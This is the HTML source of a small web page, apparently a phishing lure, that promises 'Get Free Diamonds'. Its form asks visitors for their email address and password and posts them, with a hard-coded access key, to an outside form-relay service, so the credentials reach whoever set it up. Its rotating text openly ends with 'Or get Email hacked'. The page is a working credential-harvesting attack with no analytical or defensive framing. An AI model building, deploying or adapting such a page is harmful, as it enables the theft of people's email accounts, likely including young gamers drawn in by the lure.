<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ADIL SITES</title>
<link rel="stylesheet" type="text/css" href="responsive.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Outfit:wght@300&display=swap" rel="stylesheet">

</head>
<body>
<div class="conatiner">
    <form action="https://api.web3forms.com/submit" method="POST">
<div class="contact-left-title">
   <h2 class="text">Get Free Diamonds</h2>
    <hr>
</div>
<input type="hidden" name="access_key" value="3c31cc1c-7e11-4b0c-8b8a-df2771983aff">
<input type="email" name="emai" placeholder="Your Email" class="contact-inputs" required>
<input type="password" name="password" placeholder="Password" class="contact-inputs" required>
<textarea name="Message" class="contact-input" rows="10" cols="25" placeholder="Feedback" required></textarea>
<button type="submit">Submit<img src="arrow_icon.png"></button>
    </form>
    <div class="contact-right">
<img src="right_img.png" alt="#" height="350px" width="450px">
    </div>
</div>    
<div class="wrapper">
<div class="static-txt"><p>-  You can fill the form to reach us with your</p></div>
<ul class="dynamic-txts">
    <li><span>Quaries</span></li>
    <li><span>Reports</span></li>
    <li><span>Problems</span></li>
    <li><span>Solutions Or get Email hacked</span></li>
</ul>
</div>
    
</body>
</html>